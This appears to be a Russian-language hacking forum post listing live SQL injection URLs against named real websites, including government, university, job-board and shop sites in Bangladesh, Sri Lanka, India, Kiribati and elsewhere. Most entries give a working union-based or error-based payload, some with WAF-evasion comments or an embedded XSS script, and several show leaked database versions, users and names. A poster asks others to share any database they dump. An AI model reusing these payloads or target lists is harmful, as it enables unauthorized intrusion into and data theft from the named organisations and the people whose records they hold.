Ресурс позиционирует себя как крупнейший сайт по поиску работы в Бангладеш, траф соответствует. Microsoft SQL Server 2012 - 11.0.7462.6 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=@@version -- &Fair_Id=5713 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperfcounter')) -- &Fair_Id=5713 Ну и чуть-чуть для разнообразия PostgreSQL 9.4.24 SIXSS (пофиксили ) Code: http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)||chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr(108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(41)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||concat_ws(chr(32)||chr(35)||chr(32),session_user,version(),array_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(select tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(array(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20 Sqlite 3.7.17 Code: webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20 Sqlite 3.3.7 Code: www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20
Code: http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
Поддомен sourceforge Code: http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20 Code: http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20
Make It Yours или привет от кулер_мастер Будь внимателен Code: https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20
Code: http://www.comwave.edu.pk/download.php?id=-131+union+select+concat_ws(0x3a,version(),user(),database()),2,3--
Sri Lank Ministry of Highways & Road Development Code: https://mohsl.gov.lk/en/projects.php?project=-1+union+select+1,2,3,4--&type=0&view_project=View%20Project Sri Lanka, University of Ruhuna Code: http://www.sci.ruh.ac.lk/botany/academic_staff_profile.php?id=-893+union+select+1,2,3,4,5,6,7,8,9,10,11--
Code: https://www.amaluxuryshower.it/eng/scheda-news.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24,25-- Centro Convegni Sant’Agostino Code: http://www.cortonasviluppo.it/dettaglio-news.php?id=-228+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13-- USA Indian Diaspora Council Code: http://www.indiandiasporacouncil.org/news.php?id=-86+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6-- Code: https://www.trmh.com/news.php?id=-75+union+select+1,version(),3,4,5--
Индийской шоп деревянных игрушек Code: https://gooutofbox.com/category-list.php?id=-82 union select 1,concat(user(),0x3a,version(),0x3a,database())-- - Code: https://www.renzglobal.com/eshop/product-details.php?id=-56' union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15-- - Индийский шоп. 15к трафа Code: https://www.corporategiftsbangalore.com/details.php?id=426' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- - Снова индийский шоп Code: https://www.print2shop.com/product-details.php?id=-75' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -&&idd=T-SHIRT WHITE POLYESTER Ну и последний на сегодня. Сервис принта на футболках. Страну угадайте сами
Code: http://www.gibas.ro/news.php?view=news&id=-46+union+select+1,version(),3,4,5,6,7,8--&language=en Bahauddin Zakariya University, Multan, Pakistan. Code: https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--
Чилийская адвокатская контора: Code: http://www.menayguijon.cl/detalle_b.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,database(),user(),version()),16,17--
В линке начали фильтровать union Теперь работает так. Code: http://www.fc-utd.co.uk/report.php?match_id=-1901/*!50000union*/%20/*!50000SeLeCt*/%20/*!50000version()*/%20--#
Code: https://www.carmona.org/actualidad/publicacion.php?pub=-8a5c161549d42e54e0ef1c2bf8d03cf0%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables+WHERE+table_schema=database()+limit+24,1+--+
Экономическая игра с выводом денег. Code: https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(user()))))--' https://golden-oligarch.biz/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/ https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--' https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(database()))))--' з.ы. сольете поделитесь базой, если не жалко. Мап не льет, по другому лень.
Code: http://www.elcor.ma/fiche_actualite.php?id=-77+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8--
Code: http://mapexpert.com.ua/index_ru.php?id=-20+union+select+1,2,database(),4,version(),6,7,8,9,10,11--&table=news Группа «MapExpert» была создана в 2008 году с целью популяризации дистанционного зондирования Земли (ДЗЗ) и географических информационных систем (ГИС) и их технологий на территории стран СНГ.
Code: http://heda.cndp.fr/gothique.php?projet=1¬ice=46+AND+extractvalue(1,concat(0x3a,(select+user())))--
Code: https://www.ascent-gt.com/news-full.php?id=-1+/*!12345union*/+select+1,user(),version(),database(),5,6 [email protected] 5.6.41-84.1 dailynf1_daily
Code: http://ubise-officepro.com/fr/produit.php?id=-142+union+select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+- 5.6.50-log ubiseoffbhoffice [email protected] Code: http://www.landcraft-projects.co.uk/newsitem.php?pageid=-2%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10--+- 5.7.36-log db471655925 [email protected] Code: https://upm.dipanegara.ac.id/page.php?id=-14+union+select+1,2,concat_ws(0x23,version(),database(),user())--+- 5.7.36 admin_upm admin_root@localhost
Code: https://mhms.gov.ki/category.php?id=-10%27+union+select+1,concat_ws(0x23,version(),database(),user())--+- 10.1.48-MariaDB blog_admin_db root@localhost
Code: https://itra.digitalindiacorporation.in/MIS/admin/profile_view.php?p_name=Gaurav%20Sharma%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--+- 5.7.33-0ubuntu0.16.04.1 itra_mis gaurav@localhost Code: http://www.crumbweb.org/newsdetail.php?sublink=1&id=-112+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7--+- 5.6.49-89.0-56 crumbweb_crumb2coredatabase [email protected] Code: http://acme-et.com/category.php?id=-16+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user()),3,4,5--+- 5.6.41-84.1 acmeet_acme [email protected]
